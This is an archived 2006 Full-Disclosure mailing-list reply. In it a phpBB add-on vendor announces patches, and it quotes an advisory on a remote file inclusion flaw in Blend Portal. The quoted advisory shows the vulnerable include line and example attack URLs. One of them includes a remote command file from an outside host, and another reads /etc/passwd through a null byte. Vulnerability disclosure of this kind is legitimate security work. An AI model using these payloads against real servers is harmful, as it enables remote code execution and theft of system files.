lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BAY103-F1486CBF2A15283AE39DC14E09D0@phx.gbl>
Date: Mon, 29 May 2006 12:52:22 +0000
From: "austin best" <austin_inc@...mail.com>
To: nukedx@...edx.com, submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com
Subject: RE: Advisory: Blend Portal <= 1.2.0 for phpBB
 2.x(blend_data/blend_common.php) File Inclusion Vulnerability


I have addressed this issue & the one reported about the Activity Mod Plus. 
Below is a link to patches for both. Thanks.

http://phpbb-tweaks.com/topics.html-p-17623#17623



                     Thanks For Your E-Mail

aUsTiN & Staff

For an interactinve phpBB Support board
http://phpbb-tweaks.com/

For a phpBB based portal & support
http://phpbb-portal.com/

For a phpBB based gaming system & support
http://phpbb-amod.com/

http://aUsTiN-Inc.net/





>From: Mustafa Can Bjorn IPEKCI <nukedx@...edx.com>
>To: submit@...w0rm.com, 
>full-disclosure@...ts.grok.org.uk,bugtraq@...urityfocus.com, 
>austin_inc@...mail.com
>Subject: Advisory: Blend Portal <= 1.2.0 for phpBB 
>2.x(blend_data/blend_common.php) File Inclusion Vulnerability
>Date: Sun, 28 May 2006 20:46:39 +0300
>MIME-Version: 1.0
>Received: from king.anope.net ([67.15.88.53]) by 
>bay0-mc10-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun, 
>28 May 2006 10:54:44 -0700
>Received: (qmail 1602 invoked from network); 28 May 2006 20:46:45 +0300
>Received: from localhost (@127.0.0.1)  by localhost with SMTP; 28 May 2006 
>20:46:44 +0300
>Received: from 85.103.237.117 ([85.103.237.117]) by 
>webmail.nukedx.com(Horde MIME library) with HTTP; Sun, 28 May 2006 20:46:39 
>+0300
>X-Message-Info: LsUYwwHHNt3IkD50dWx1Zh4q3nci+v36uLgoVBpjm50=
>User-Agent: Internet Messaging Program (IMP) H3 (4.1)
>Return-Path: nukedx@...edx.com
>X-OriginalArrivalTime: 28 May 2006 17:54:44.0992 (UTC) 
>FILETIME=[CDAF6800:01C6827F]
>
>--Security Report--
>Advisory: Blend Portal <= 1.2.0 for phpBB 2.x  
>(blend_data/blend_common.php) File Inclusion Vulnerability.
>---
>Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
>---
>Date: 28/05/06 07:52 PM
>---
>Contacts:{
>ICQ: 10072
>MSN/Email: nukedx@...edx.com
>Web: http://www.nukedx.com
>}
>---
>Vendor: phpbb-portal (http://www.phpbb-portal.com/)
>Version: 1.2.0 and prior versions must be affected.
>About: Via this methods remote attacker can include arbitrary  
>internal/external files to phpBB. phpbb_root_path
>variable in /blend_data/blend_common.php did not sanitized properly  before 
>using it.You can find vulnerable code in
>blend_common.php at lines 74-77
>-Source in blend_common.php-
>74: else
>75: {
>76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH  
>.'config.'. $phpEx);
>77: }
>-End of source-
>Level: Highly Critical
>---
>How&Example:
>Succesful exploitation needs register_globals on & allow url_fopen on
>GET ->  
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
>EXAMPLE ->  
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
>EXAMPLE ->  
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00
>---
>Timeline:
>* 28/05/2006: Vulnerability found.
>* 28/05/2006: Contacted with vendor and waiting reply.
>---
>Exploit: http://www.nukedx.com/?getxpl=41
>---
>Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
>

_________________________________________________________________
Don’t just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ